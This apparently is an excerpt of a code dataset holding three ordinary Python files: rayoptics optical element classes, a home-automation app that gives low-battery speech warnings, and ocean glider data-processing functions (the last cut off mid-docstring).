Manage rendering and selection/editing.\n\n    A CementedElement consists of 3 or more Surfaces, 2 or more Gaps, and\n    edge_extent information.\n\n    Attributes:\n        parent: the :class:`ElementModel`\n        label: string identifier\n        idxs: list of seq_model interface indices\n        ifcs: list of :class:`~rayoptics.seq.interface.Interface`\n        gaps: list of thickness and material :class:`~rayoptics.seq.gap.Gap`\n        tfrm: global transform to element origin, (Rot3, trans3)\n        medium_name: the material filling the gap\n        flats: semi-diameter of flat if ifc is concave, or None\n        handles: dict of graphical entities\n        actions: dict of actions associated with the graphical handles\n    \"\"\"\n    clut = rgbt.RGBTable(filename='red_blue64.csv',\n                         data_range=[10.0, 100.])\n\n    label_format = 'CE{}'\n    serial_number = 0\n\n    def __init__(self, ifc_list, label=None):\n        if label is None:\n            CementedElement.serial_number += 1\n            self.label = CementedElement.label_format.format(\n                CementedElement.serial_number)\n        else:\n            self.label = label\n\n        g_tfrm = ifc_list[0][4]\n        if g_tfrm is not None:\n            self.tfrm = g_tfrm\n        else:\n            self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n        self.idxs = []\n        self.ifcs = []\n        self.gaps = []\n        self.medium_name = ''\n        for interface in ifc_list:\n            i, ifc, g, z_dir, g_tfrm = interface\n            self.idxs.append(i)\n            self.ifcs.append(ifc)\n            if g is not None:\n                self.gaps.append(g)\n                if self.medium_name != '':\n                    self.medium_name += ', '\n                self.medium_name += g.medium.name()\n\n        if len(self.gaps) == len(self.ifcs):\n            self.gaps.pop()\n            self.medium_name = self.medium_name.rpartition(',')[0]\n\n        self._sd = self.update_size()\n        self.flats = [None]*len(self.ifcs)\n\n        self.handles = {}\n        self.actions = {}\n\n    @property\n    def sd(self):\n        \"\"\"Semi-diameter \"\"\"\n        return self._sd\n\n    @sd.setter\n    def sd(self, semidiam):\n        self._sd = semidiam\n        self.edge_extent = (-semidiam, semidiam)\n\n    def __json_encode__(self):\n        attrs = dict(vars(self))\n        del attrs['parent']\n        del attrs['tfrm']\n        del attrs['ifcs']\n        del attrs['gaps']\n        del attrs['flats']\n        del attrs['handles']\n        del attrs['actions']\n        return attrs\n\n    def __str__(self):\n        fmt = 'CementedElement: {}'\n        return fmt.format(self.idxs)\n\n    def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n        # when restoring, we want to use the stored indices to look up the\n        # new object instances\n        self.parent = ele_model\n        self.ifcs = [surfs[i] for i in self.idxs]\n        self.gaps = [gaps[i] for i in self.idxs[:-1]]\n        self.tfrm = tfrms[self.idxs[0]]\n        self.flats = [None]*len(self.ifcs)\n        if not hasattr(self, 'medium_name'):\n            # a CementedElement has a list of gaps, not a single gap\n            self.medium_name = ', '.join(g.medium.name() for g in self.gaps)\n\n    def sync_to_update(self, seq_model):\n        # when updating, we want to use the stored object instances to get the\n        # current indices into the interface list (e.g. 
to handle insertion and\n        # deletion of interfaces)\n        self.idxs = [seq_model.ifcs.index(ifc) for ifc in self.ifcs]\n\n    def element_list(self):\n        idxs = self.idxs\n        ifcs = self.ifcs\n        gaps = self.gaps\n        e_list = []\n        for i in range(len(gaps)):\n            e = Element(ifcs[i], ifcs[i+1], gaps[i],\n                        sd=self.sd, tfrm=self.tfrm,\n                        idx=idxs[i], idx2=idxs[i+1])\n            e_list.append(e)\n        return e_list\n\n    def tree(self, **kwargs):\n        default_tag = '#element#cemented'\n        tag = default_tag + kwargs.get('tag', '')\n        zdir = kwargs.get('z_dir', 1)\n        ce = Node('CE', id=self, tag=tag)\n        for i, sg in enumerate(itertools.zip_longest(self.ifcs, self.gaps),\n                               start=1):\n            ifc, gap = sg\n            pid = f'p{i}'\n            p = Node(pid, id=ifc.profile, tag='#profile', parent=ce)\n            Node(f'i{self.idxs[i-1]}', id=ifc, tag='#ifc', parent=p)\n            # Gap branch\n            if gap is not None:\n                t = Node(f't{i}', id=gap, tag='#thic', parent=ce)\n                Node(f'g{self.idxs[i-1]}', id=(gap, zdir),\n                     tag='#gap', parent=t)\n\n        return ce\n\n    def reference_interface(self):\n        return self.ifcs[0]\n\n    def reference_idx(self):\n        return self.idxs[0]\n\n    def interface_list(self):\n        return self.ifcs\n\n    def gap_list(self):\n        return self.gaps\n\n    def update_size(self):\n        extents = np.union1d(self.ifcs[0].get_y_aperture_extent(),\n                             self.ifcs[-1].get_y_aperture_extent())\n        self.edge_extent = (extents[0], extents[-1])\n        self.sd = max([ifc.surface_od() for ifc in self.ifcs])\n        return self.sd\n\n    def compute_flat(self, s):\n        ca = s.surface_od()\n        if (1.0 - ca/self.sd) >= 0.05:\n            flat = ca\n        else:\n            flat = None\n        return flat\n\n    def extent(self):\n        if hasattr(self, 'edge_extent'):\n            return self.edge_extent\n        else:\n            return (-self.sd, self.sd)\n\n    def render_shape(self):\n        if self.ifcs[0].profile_cv < 0.0:\n            self.flats[0] = self.compute_flat(self.ifcs[0])\n        else:\n            self.flats[0] = None\n        if self.ifcs[-1].profile_cv > 0.0:\n            self.flats[-1] = self.compute_flat(self.ifcs[-1])\n        else:\n            self.flats[-1] = None\n\n        # generate the profile polylines\n        self.profiles = []\n        sense = 1\n        for ifc, flat in zip(self.ifcs, self.flats):\n            poly = ifc.full_profile(self.extent(), flat, sense)\n            self.profiles.append(poly)\n            sense = -sense\n\n        # offset the profiles wrt the element origin\n        thi = 0\n        for i, poly_profile in enumerate(self.profiles[1:]):\n            thi += self.gaps[i].thi\n            for p in poly_profile:\n                p[0] += thi\n\n        # just return outline\n        poly_shape = []\n        poly_shape += self.profiles[0]\n        poly_shape += self.profiles[-1]\n        poly_shape.append(poly_shape[0])\n\n        return poly_shape\n\n    def render_handles(self, opt_model):\n        self.handles = {}\n\n        shape = self.render_shape()\n        # self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon')\n\n        for i, gap in enumerate(self.gaps):\n            poly = []\n            poly += self.profiles[i]\n            poly += self.profiles[i+1]\n            poly.append(self.profiles[i][0])\n            color = calc_render_color_for_material(gap.medium)\n            self.handles['shape'+str(i+1)] = GraphicsHandle(poly, self.tfrm,\n                                                            'polygon', color)\n        return self.handles\n\n    def handle_actions(self):\n        self.actions = {}\n\n        return self.actions\n\n\nclass ThinElement():\n\n    label_format = 'TL{}'\n    serial_number = 0\n\n    def __init__(self, ifc, tfrm=None, idx=0, sd=None, label=None):\n        if label is None:\n            ThinElement.serial_number += 1\n            self.label = ThinElement.label_format.format(\n                ThinElement.serial_number)\n        else:\n            self.label = label\n\n        self.render_color = (192, 192, 192)\n        if tfrm is not None:\n            self.tfrm = tfrm\n        else:\n            self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n        self.intrfc = ifc\n        self.intrfc_indx = idx\n        self.medium_name = 'Thin 
Element'\n if sd is not None:\n self.sd = sd\n else:\n self.sd = ifc.max_aperture\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['intrfc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.intrfc)\n\n def tree(self, **kwargs):\n default_tag = '#element#thinlens'\n tag = default_tag + kwargs.get('tag', '')\n tle = Node('TL', id=self, tag=tag)\n Node('tl', id=self.intrfc, tag='#ifc', parent=tle)\n return tle\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.intrfc_indx]\n self.intrfc = surfs[self.intrfc_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Thin Element'\n\n ro_version = ele_model.opt_model.ro_version\n if version.parse(ro_version) < version.parse(\"0.7.0a\"):\n ThinElement.serial_number += 1\n self.label = ThinElement.label_format.format(ThinElement.serial_number)\n\n def sync_to_update(self, seq_model):\n self.intrfc_indx = seq_model.ifcs.index(self.intrfc)\n\n def reference_interface(self):\n return self.intrfc\n\n def reference_idx(self):\n return self.intrfc_indx\n\n def interface_list(self):\n return [self.intrfc]\n\n def gap_list(self):\n return []\n\n def update_size(self):\n self.sd = self.intrfc.surface_od()\n return self.sd\n\n def render_shape(self):\n poly = self.intrfc.full_profile((-self.sd, self.sd))\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n shape = self.render_shape()\n self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon',\n self.render_color)\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n return self.actions\n\nclass DummyInterface():\n\n label_format = 'D{}'\n serial_number = 0\n\n def __init__(self, ifc, idx=0, sd=None, tfrm=None, label=None):\n if label is None:\n DummyInterface.serial_number += 1\n self.label = DummyInterface.label_format.format(\n DummyInterface.serial_number)\n else:\n self.label = label\n\n self.render_color = (192, 192, 192)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.ref_ifc = ifc\n self.idx = idx\n self.medium_name = 'Interface'\n if sd is not None:\n self.sd = sd\n else:\n self.sd = ifc.max_aperture\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['ref_ifc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.ref_ifc)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.idx]\n self.ref_ifc = surfs[self.idx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Interface'\n\n def sync_to_update(self, seq_model):\n self.idx = seq_model.ifcs.index(self.ref_ifc)\n\n def tree(self, **kwargs):\n default_tag = '#dummyifc'\n tag = default_tag + kwargs.get('tag', '')\n di = Node('DI', id=self, tag=tag)\n p = Node('p', id=self.ref_ifc.profile, tag='#profile', parent=di)\n Node(f'i{self.idx}', id=self.ref_ifc, tag='#ifc', parent=p)\n return di\n\n def reference_interface(self):\n return self.ref_ifc\n\n def reference_idx(self):\n return self.idx\n\n def interface_list(self):\n return [self.ref_ifc]\n\n def gap_list(self):\n return []\n\n def update_size(self):\n self.sd = self.ref_ifc.surface_od()\n return self.sd\n\n def render_shape(self):\n poly = 
self.ref_ifc.full_profile((-self.sd, self.sd))\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n\n self.handles['shape'] = GraphicsHandle(self.render_shape(), self.tfrm,\n 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n def get_adj_spaces():\n seq_model = self.parent.opt_model.seq_model\n if self.idx > 0:\n before = seq_model.gaps[self.idx-1].thi\n else:\n before = None\n if self.idx < seq_model.get_num_surfaces() - 1:\n after = seq_model.gaps[self.idx].thi\n else:\n after = None\n return (before, after)\n\n def set_adj_spaces(cur_value, change):\n seq_model = self.parent.opt_model.seq_model\n if cur_value[0] is not None:\n seq_model.gaps[self.idx-1].thi = cur_value[0] + change\n if cur_value[1] is not None:\n seq_model.gaps[self.idx].thi = cur_value[1] - change\n\n slide_action = {}\n slide_action['x'] = Action(get_adj_spaces, set_adj_spaces)\n self.actions['shape'] = slide_action\n\n return self.actions\n\n\nclass AirGap():\n\n label_format = 'AG{}'\n serial_number = 0\n\n def __init__(self, g, idx=0, tfrm=None, label=None):\n if label is None:\n AirGap.serial_number += 1\n self.label = AirGap.label_format.format(AirGap.serial_number)\n else:\n self.label = label\n\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n\n self.render_color = (237, 243, 254, 64) # light blue\n self.gap = g\n self.medium_name = self.gap.medium.name()\n self.idx = idx\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['gap']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.gap)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.gap = gaps[self.idx]\n self.tfrm = tfrms[self.idx]\n if not hasattr(self, 'render_color'):\n self.render_color = (237, 243, 254, 64) # light blue\n if not hasattr(self, 'medium_name'):\n self.medium_name = self.gap.medium.name()\n\n ro_version = ele_model.opt_model.ro_version\n if version.parse(ro_version) < version.parse(\"0.7.0a\"):\n AirGap.serial_number += 1\n self.label = AirGap.label_format.format(AirGap.serial_number)\n\n def sync_to_update(self, seq_model):\n self.idx = seq_model.gaps.index(self.gap)\n\n def tree(self, **kwargs):\n default_tag = '#airgap'\n tag = default_tag + kwargs.get('tag', '')\n ag = Node('AG', id=self, tag=tag)\n t = Node('t', id=self.gap, tag='#thic', parent=ag)\n zdir = kwargs.get('z_dir', 1)\n Node(f'g{self.idx}', id=(self.gap, zdir), tag='#gap', parent=t)\n return ag\n\n def reference_interface(self):\n return None\n\n def reference_idx(self):\n return self.idx\n\n def interface_list(self):\n return []\n\n def gap_list(self):\n return [self.gap]\n\n def update_size(self):\n pass\n\n def render_handles(self, opt_model):\n self.handles = {}\n\n poly_ct = []\n poly_ct.append([0., 0.])\n poly_ct.append([self.gap.thi, 0.])\n\n # Modify the tfrm to account for any decenters following\n # the reference ifc.\n tfrm = self.tfrm\n decenter = opt_model.seq_model.ifcs[self.idx].decenter\n if decenter is not None:\n r_global, t_global = tfrm\n r_after_ifc, t_after_ifc = decenter.tform_after_surf()\n t = r_global.dot(t_after_ifc) + t_global\n r = r_global if r_after_ifc is None else r_global.dot(r_after_ifc)\n tfrm = r, t\n\n self.handles['ct'] = GraphicsHandle(poly_ct, tfrm, 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n 
self.actions = {}\n\n ct_action = {}\n ct_action['x'] = AttrAction(self.gap, 'thi')\n self.actions['ct'] = ct_action\n\n return self.actions\n\n\n# --- Element model\nclass ElementModel:\n \"\"\"Maintain the element based representation of the optical model\n\n Attributes:\n opt_model: the :class:`~rayoptics.optical.opticalmodel.OpticalModel`\n elements: list of element type things\n\n \"\"\"\n\n def __init__(self, opt_model, **kwargs):\n self.opt_model = opt_model\n self.elements = []\n\n def reset(self):\n self.__init__(self.opt_model)\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['opt_model']\n return attrs\n\n def sync_to_restore(self, opt_model):\n self.opt_model = opt_model\n seq_model = opt_model.seq_model\n surfs = seq_model.ifcs\n gaps = seq_model.gaps\n tfrms = seq_model.compute_global_coords(1)\n\n # special processing for older models\n # self.airgaps_from_sequence(seq_model, tfrms)\n # self.add_dummy_interface_at_image(seq_model, tfrms)\n\n self.reset_serial_numbers()\n for i, e in enumerate(self.elements, start=1):\n e.sync_to_restore(self, surfs, gaps, tfrms)\n if not hasattr(e, 'label'):\n e.label = e.label_format.format(i)\n self.sequence_elements()\n # self.relabel_airgaps()\n\n def reset_serial_numbers(self):\n Element.serial_number = 0\n Mirror.serial_number = 0\n CementedElement.serial_number = 0\n ThinElement.serial_number = 0\n DummyInterface.serial_number = 0\n AirGap.serial_number = 0\n\n def airgaps_from_sequence(self, seq_model, tfrms):\n \"\"\" add airgaps and dummy interfaces to an older version model \"\"\"\n for e in self.elements:\n if isinstance(e, AirGap):\n return # found an AirGap, model probably OK\n\n num_elements = 0\n seq_model = self.opt_model.seq_model\n for i, g in enumerate(seq_model.gaps):\n if g.medium.name().lower() == 'air':\n if i > 0:\n s = seq_model.ifcs[i]\n tfrm = tfrms[i]\n num_elements = self.process_airgap(\n seq_model, i, g, s, tfrm,\n num_elements, add_ele=False)\n\n def add_dummy_interface_at_image(self, seq_model, tfrms):\n if len(self.elements) and self.elements[-1].label == 'Image':\n return\n\n s = seq_model.ifcs[-1]\n idx = seq_model.get_num_surfaces() - 1\n di = DummyInterface(s, sd=s.surface_od(), tfrm=tfrms[-1], idx=idx,\n label='Image')\n self.opt_model.part_tree.add_element_to_tree(di, tag='#image')\n self.add_element(di)\n\n def update_model(self, **kwargs):\n seq_model = self.opt_model['seq_model']\n tfrms = seq_model.compute_global_coords(1)\n\n # dynamically build element list from part_tree\n part_tree = self.opt_model['part_tree']\n nodes = part_tree.nodes_with_tag(tag='#element#airgap#dummyifc')\n elements = [n.id for n in nodes]\n\n # hook or unhook elements from ele_model\n cur_set = set(self.elements)\n new_set = set(elements)\n added_ele = list(new_set.difference(cur_set))\n for e in added_ele:\n e.parent = self\n removed_ele = list(cur_set.difference(new_set))\n for e in removed_ele:\n e.parent = None\n\n # update the elements\n for e in elements:\n e.update_size()\n e.sync_to_update(seq_model)\n e.tfrm = tfrms[e.reference_idx()]\n\n self.elements = elements\n self.sequence_elements()\n\n def sequence_elements(self):\n \"\"\" Sort elements in order of reference interfaces in seq_model \"\"\"\n seq_model = self.opt_model.seq_model\n\n # sort by element reference interface sequential index\n self.elements.sort(key=lambda e: e.reference_idx())\n\n # Make sure z_dir matches the sequential model. 
Used to get\n # the correct substrate offset.\n if hasattr(seq_model, 'z_dir'):\n for e in self.elements:\n if hasattr(e, 'z_dir'):\n e.z_dir = seq_model.z_dir[e.reference_idx()]\n\n def relabel_airgaps(self):\n for i, e in enumerate(self.elements):\n if isinstance(e, AirGap):\n eb = self.elements[i-1].label\n ea = self.elements[i+1].label\n e.label = AirGap.label_format.format(eb + '-' + ea)\n\n def add_element(self, e):\n e.parent = self\n self.elements.append(e)\n\n def remove_element(self, e):\n e.parent = None\n self.elements.remove(e)\n\n def remove_node(self, e_node):\n part_tree = self.opt_model.part_tree\n nodes = part_tree.nodes_with_tag(tag='#element#airgap#dummyifc',\n root=e_node)\n eles = [n.id for n in nodes]\n for e in eles:\n self.remove_element(e)\n\n def get_num_elements(self):\n return len(self.elements)\n\n def list_model(self, tag='#element#dummyifc'):\n nodes = self.opt_model.part_tree.nodes_with_tag(tag=tag)\n elements = [n.id for n in nodes]\n for i, ele in enumerate(elements):\n print(\"%d: %s (%s): %s\" %\n (i, ele.label, type(ele).__name__, ele))\n\n def list_elements(self):\n for i, ele in enumerate(self.elements):\n print(\"%d: %s (%s): %s\" %\n (i, ele.label, type(ele).__name__, ele))\n\n def element_type(self, i):\n return type(self.elements[i]).__name__\n","sub_path":"src/rayoptics/elem/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":44674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547655100","text":"from base import Base\r\nfrom globals import PEOPLE, presence_state\r\nfrom typing import Tuple, Union\r\n\"\"\"\r\nClass LowBatteryManager manages the low battery warning TTS \r\n\r\n\r\n\"\"\"\r\nclass LowBatteryManager(Base):\r\n\r\n def initialize(self) -> None:\r\n \"\"\"Initialize.\"\"\"\r\n super().initialize() # Always call base class\r\n\r\n self._people = self.args.get(\"people\", {})\r\n self._low_bat_level = int(self.args.get(\"battery_level_low\", \"15\"))\r\n self._tts_device = self.args.get(\"tts_device\", \"media_player.house\")\r\n\r\n for person in self._people:\r\n self.log(\"Setup tracker {}\".format(PEOPLE[person]['device_tracker']))\r\n self.listen_state(\r\n self.__on_tracker_changed, \r\n entity=PEOPLE[person]['device_tracker'],\r\n attribute=\"all\",\r\n person=person\r\n )\r\n\r\n def __on_tracker_changed(\r\n self, entity: Union[str, dict], attribute: str, old: dict,\r\n new: dict, kwargs: dict) -> None:\r\n\r\n if old is None:\r\n return\r\n\r\n person = kwargs['person']\r\n batt_level = int(new[\"attributes\"].get(\"battery_level\", \"100\"))\r\n old_bat_lev = int(old[\"attributes\"].get(\"battery_level\", \"100\"))\r\n state = new[\"state\"]\r\n \r\n if batt_level != old_bat_lev and self.now_is_between(\"07:00:00\", \"22:30:00\"):\r\n self.log(\"{} changed battery status from {} to {}\".format(entity, old_bat_lev, batt_level))\r\n\r\n if old_bat_lev > self._low_bat_level and \\\r\n batt_level<=self._low_bat_level and \\\r\n state==presence_state[\"home\"] and \\\r\n self.now_is_between(\"07:00:00\", \"22:30:00\"):\r\n # Battery level went from over min level to under min level and the person is home, lets warn!\r\n self.tts_manager.speak(\"{}, dags att ladda din mobil. 
{} ladda din mobil nu!\".format(person, person), media_player=self._tts_device)","sub_path":"appdaemon/apps/presence/low_battery.py","file_name":"low_battery.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"488896902","text":"#!/usr/bin/env python\nfrom __future__ import (print_function as _pf,\n unicode_literals as _ul,\n absolute_import as _ai)\n\n\ndef calc_physics(variable, dives, depth,\n spike_window=3, spike_method='minmax',\n iqr=1.5,\n savitzky_golay_window=11, savitzky_golay_order=2,\n verbose=True, name='Physics Variable'):\n \"\"\"\n This function is a standard setup for processing physics\n variables (temperature and salinity).\n\n The function applies a neighbourhood interquartile range (IQR)\n outlier filter, the Briggs et al. (2011) spike filter\n followed by a Savitzky-Golay smoothing function.\n\n For more information about the neighbourhood IQR outlier filter\n see the docs for buoyancy_glider_utils.tools.neighbourhood_iqr.\n\n The Savitzky-Golay filter is demonstrated well on wikipedia:\n https://en.wikipedia.org/wiki/Savitzky-Golay_filter\n \"\"\"\n\n from pandas import Series\n from numpy import array, ma, NaN, inf\n from .cleaning import savitzky_golay, despike, outlier_bounds_iqr\n from . import optics as op\n\n x = array(dives)\n y = array(depth)\n\n # an interpolation step is added so that no nans are created.\n # Note that this interpolates on the flattened series\n if isinstance(variable, Series):\n name = variable.name\n\n if verbose:\n print('\\n' + '=' * 50 + \"\\n{}:\".format(name))\n\n if iqr:\n ll, ul = outlier_bounds_iqr(variable, multiplier=iqr)\n mask = (variable < ll) | (variable > ul)\n z = variable.where(~mask)\n if verbose:\n print(' Removing outliers with IQR * {}: {} obs'.format(iqr, mask.sum()))\n\n if spike_window:\n b, s = despike(z, spike_window, spike_method)\n z = b\n if verbose:\n print(\n \" Removing spikes with rolling median (spike window={})\"\n \"\".format(spike_window))\n\n if savitzky_golay_window:\n if verbose:\n print(\" Smoothing with Savitzky-Golay filter (window={}, order={})\".format(savitzky_golay_window, savitzky_golay_order))\n z = savitzky_golay(z, savitzky_golay_window, savitzky_golay_order)\n\n return Series(z, name=name)\n\n\ndef calc_oxygen(o2raw, pressure, salinity, temperature, conversion='auto',\n spike_window=7, spike_method='median',\n savitzky_golay_window=0, savitzky_golay_order=2,\n verbose=True):\n \"\"\"\n This function processes oxygen. It is assumed that either\n mL/L or umol/kg are passed as input. The units are automatically\n detected by looking at the mean ratio\n Below are some conversions to help with the Oxygen units\n µmol/l > µmol/kg * 1.025\n µmol/l > ml/l * 44.66\n µmol/l > mg/l * 31.25\n \"\"\"\n\n from sklearn.linear_model import LinearRegression\n from numpy import isnan, abs, array, ones, c_, median\n from . 
cleaning import outlier_bounds_iqr, despike, savitzky_golay\n import seawater as sw\n from pandas import Series\n\n if isinstance(o2raw, Series):\n name = o2raw.name\n else:\n name = 'Oxygen'\n\n if spike_window:\n o2raw, _ = despike(o2raw, spike_window, spike_method)\n if verbose:\n print(\n '\\n' + '=' * 50 + \"\\n{}:\\n\"\n \"\\tSmoothing data with despiking algorithm:\\n\\t\"\n \" spike identification (spike window={})\"\n \"\".format(name, spike_window))\n\n if savitzky_golay_window:\n if verbose:\n print(\"\\tSmoothing with Savitzky-Golay filter (window={}, order={})\".format(savitzky_golay_window, savitzky_golay_order))\n o2raw = savitzky_golay(o2raw, savitzky_golay_window, savitzky_golay_order)\n\n o2sat = sw.satO2(salinity, temperature)\n density = sw.dens(salinity, temperature, pressure)\n\n if conversion == 'auto':\n # use linear regression to determine the oxygen unit\n # raw surface (<10m) O2 is regressed theoretical saturation\n # the slope of the regression will be indicative of the\n # units as theoretical saturation is always in mL/L\n # Use the min difference between the slope and known\n # conversion factors to estimate the appropriate conversion.\n\n # clean the data first with basic cleaning\n surf = ((pressure < 20) & ~isnan(o2raw) & ~isnan(o2sat))\n # prepare the data for linear regression\n Y = o2raw[surf].copy()\n X = c_[ones(surf.sum()), o2sat[surf]]\n # removing outliers accodring to IQR\n ll, ul = outlier_bounds_iqr(Y, multiplier=1.5)\n m = (Y > ll) & (Y < ul)\n ratios = Y[m] / X[m, 1]\n\n # compare the slopes\n observed_ratio = median(ratios)\n # the theoretical values have been divided by 1.025 to account for\n # the density of seawater\n theoretic_ratio = array([1, 43.5])\n ratio_diffs = abs(observed_ratio - theoretic_ratio)\n # catch if the difference is too big\n if ratio_diffs.min() > 10:\n print('Oxygen unit could not be estimated automatically. '\n 'Do the unit conversion on the raw data before '\n 'passing it to the function. \\n'\n 'Below is some info to help you\\n'\n ' µmol/l > µmol/kg * 1.025\\n'\n ' µmol/l > ml/l * 44.66\\n'\n ' µmol/l > mg/l * 31.25')\n # otherwise do the conversion\n else:\n unit_idx = ratio_diffs.argmin()\n if unit_idx == 0:\n unit = 'mL/L'\n o2mll = array(o2raw)\n elif unit_idx == 2:\n unit = 'mg/L'\n o2mll = array(o2raw) / 31.25 * (density / 1000)\n elif unit_idx == 1:\n unit = 'umol/kg'\n o2mll = array(o2raw) / 44.66 * (density / 1000)\n else:\n print('Difference is {}'.format(ratio_diffs))\n print('\\tUnits automatically detected {}'.format(unit))\n if ratio_diffs.min() > 5:\n print('\\tWARNING: Confirm units mannually as near the confidence threshold')\n o2aou = o2sat - o2mll\n o2pct = o2mll / o2sat * 100\n return o2mll, o2pct, o2aou\n\n else:\n print(\n \"No oxygen conversion applied - user \"\n \"must impliment before or after running \"\n \"the cleaning functions.\")\n\n\ndef calc_backscatter(bb_raw, wavelength, tempC, salt, dives, depth,\n dark_count, scale_factor, deep_method='median', iqr=3,\n profiles_ref_depth=300, deep_multiplier=1,\n spike_window=7, spike_method='median',\n return_figure=False, verbose=True):\n \"\"\"\n INORMATION\n ----------\n Process the raw backscattering data from channel 2 at wavelength 700 nm.\n NOTE: This uses the same processing steps as calc_bb1.\n\n Use standard values for the CSIR SeaGliders to process backscatter.\n wavelength = 700nm\n theta angle of sensors = 124deg\n xfactor for theta 124 = 1.076\n This function also makes use of the flo_functions toolkit (Zhang et al. 
2009)\n to calculate total backscatter.\n\n The following steps are applied in this sequence:\n 1. find_bad_profiles (high values below 300 m are counted as bad profiles)\n 2. flo_scale_and_offset (factory scale and offset)\n 3. flo_bback_total (total backscatter based on Zhang et al. 2009)\n 4. backscatter_dark_count (based on Briggs et al. 2011)\n 5. seperate_spikes (using Briggs et al. 2011 - rolling min--max)\n 6. neighbourhood_iqr (see buoyancy_glider_utils.tools.neighbourhood_iqr)\n\n INPUT\n -----\n All inputs must be ungridded np.ndarray or pd.Series data\n bb_raw raw output from backscatter 470 nm\n tempC QC'd temperature in degC\n salt QC'd salinity in PSU\n dives the dive count (round is down dives, 0.5 up dives)\n depth in metres\n\n wavelength e.g. 700 nm / 470 nm\n dark_count factory values from the cal sheet\n scale_factor factory values from the cal sheet\n spike_window the window size over which to run the despiking\n spike_method whether to use a rolling median or combination of min+max filter\n profiles_ref_depth the reference depth to determine bad profiles\n method whether to use the deep median or deep mean to determine bad profiles\n neighbour_iqr_multiplier the multiplier for the iqr\n neighbour_depth_window the depth window for the iqr\n neighbour_dives_window the dive window for the iqr\n\n return_figure return a figure object that shows the before and after\n verbose will print the progress of the processing\n\n OUTPUT\n ------\n baseline an np.ma.masked_array with the mask denoting the filtered values\n the baseline of the backscatter as defined by Briggs et al. 2011\n spikes the spikes of backscatter from Briggs et al. 2011\n fig a figure object if return_figure=True else returns None\n \"\"\"\n from numpy import array, nan, count_nonzero, unique\n from pandas import Series\n from . import optics as op\n from . import flo_functions as ff\n from .cleaning import despike, despiking_report, outlier_bounds_iqr\n\n bb_raw = Series(bb_raw.copy())\n dives = array(dives)\n depth = array(depth)\n tempC = array(tempC)\n salt = array(salt)\n name = 'bb{:.0f}'.format(wavelength)\n theta = 124 # factory set angle of optical sensors\n xfactor = 1.076 # for theta 124\n\n ref_depth = profiles_ref_depth\n stdev_multiplier = deep_multiplier\n method = deep_method\n\n dive_count = count_nonzero(unique(dives))\n\n if verbose:\n print('\\n' + '=' * 50 + \"\\n{}:\".format(name))\n\n if iqr:\n ll, ul = outlier_bounds_iqr(bb_raw, multiplier=iqr)\n mask = (bb_raw < ll) | (bb_raw > ul)\n z = bb_raw.where(~mask)\n if verbose:\n print('\\tRemoving outliers with IQR * {}: {} obs'.format(iqr, mask.sum()))\n\n if verbose:\n print('\\tMask bad profiles based on deep values (depth={}m)'.format(ref_depth))\n bad_profiles = op.find_bad_profiles(dives, depth, bb_raw, ref_depth, stdev_multiplier, method)\n bb_raw[bad_profiles[0]] = nan\n\n bad_count = count_nonzero(bad_profiles[1])\n\n if verbose:\n print('\\tNumber of bad profiles = {}/{}'.format(bad_count, dive_count))\n\n if verbose:\n print('\\tZhang et al. (2009) correction')\n beta = ff.flo_scale_and_offset(bb_raw, dark_count, scale_factor)\n bbp = ff.flo_bback_total(beta, tempC, salt, theta, wavelength, xfactor)\n\n # This is from .Briggs et al. 
(2011)\n if verbose:\n print('\\tDark count correction')\n bbp = op.backscatter_dark_count(bbp, depth)\n\n if verbose:\n print(\n \"\\tSpike identification (spike window={})\"\n \"\".format(spike_window))\n\n baseline, spikes = despike(bbp, spike_window, spike_method='median')\n baseline = Series(baseline, name=\"bb{:.0f}\".format(wavelength))\n\n if not return_figure:\n return baseline, spikes\n else:\n if verbose:\n print('\\tGenerating figure for despiking report')\n fig = despiking_report(dives, depth, bbp, baseline, spikes, name=name)\n\n return baseline, spikes, fig\n\n\ndef calc_fluorescence(flr_raw, bbp, dives, depth, time, lat, lon, dark_count, scale_factor,\n spike_window=7, spike_method='median',\n par=None, quenching_layer=None,\n night_day_group=True, sunrise_sunset_offset=1,\n profiles_ref_depth=300, deep_multiplier=1, deep_method='median',\n return_figure=False, verbose=True):\n \"\"\"\n INFORMATION\n -----------\n This function processes Fluorescence and corrects for quenching using\n the Thomalla et al. (2017) approach.\n\n The standard sequence is applied:\n 1. find_bad_profiles (high Fluorescence in > 300 m water signals bad 